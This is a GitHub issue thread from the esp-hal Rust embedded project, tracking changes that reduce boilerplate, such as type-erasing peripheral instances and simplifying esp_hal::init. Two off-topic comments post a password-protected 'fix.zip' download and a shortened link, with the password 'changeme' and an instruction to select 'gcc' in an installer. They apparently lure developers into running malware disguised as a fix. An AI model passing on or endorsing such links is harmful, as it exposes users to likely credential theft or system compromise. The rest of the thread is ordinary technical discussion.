### ISSUE TITLE
Tracking issue to reduce boilerplate

### ISSUE THREAD

**Issue by bugadani** [esp-rs/esp-hal#2010]
The goal of this issue is to lower the amount of code the users need to write for no good reason.

- #1957
- #2012
- #1970
- #1999
- #2070
- #2133
- #2134
- #2136
- #2248
- #2260
- Type-erase peripheral instances where practical
  - #2334
  - #2359
  - #2361
  - #2367 
  - #2381
  - ADC
  - Timers
  - Add to API-GUIDELINES to design new drivers with erasure in mind. 
- #2339
- #2374
- #2373
- Resolve #2321
- Resolve #2389
- #2403 
- #2532
- #2486
- #2508

Feel free to share your pain point if you have any!

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ReversingMe** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by scottdalgliesh** [comment]
Would it make sense to also initialize and return the io driver by default in `esp_hal::init`? It seems like most use cases will require access to io, but I could certainly be overlooking/misunderstanding something. 

Regardless, great work on these simplifications - love to see it.

**Comment by bugadani** [comment]
^ a good thing to keep in mind, although we deliberately don't initialize any peripherals at this point.

Slightly different:

With build scripts, we could define, based on present/missing features, some default behaviour. For example, unless anything is set by the user, we could select esp-printf/log by default. If the user wants to override, they would have the option, **without** needing `default-features = false`.

(Probably a more interesting example is `esp-hal-embassy/integrated-timers` though for that, we should delegate the `generic-queue-*` features, unfortunately.)

Do we want something like this?

**Comment by MabezDev** [comment]
I think we should think about closing this.

It's been great to track the "obviously" good choices (the `init` changes etc), but I think at this point most of the decisions we need to make going forward are non-trivial and require discussion before we commit to the design. We should track those in individual issues.

**Comment by bugadani** [comment]
I suppose I'll mark the last DMA PR to close this :)
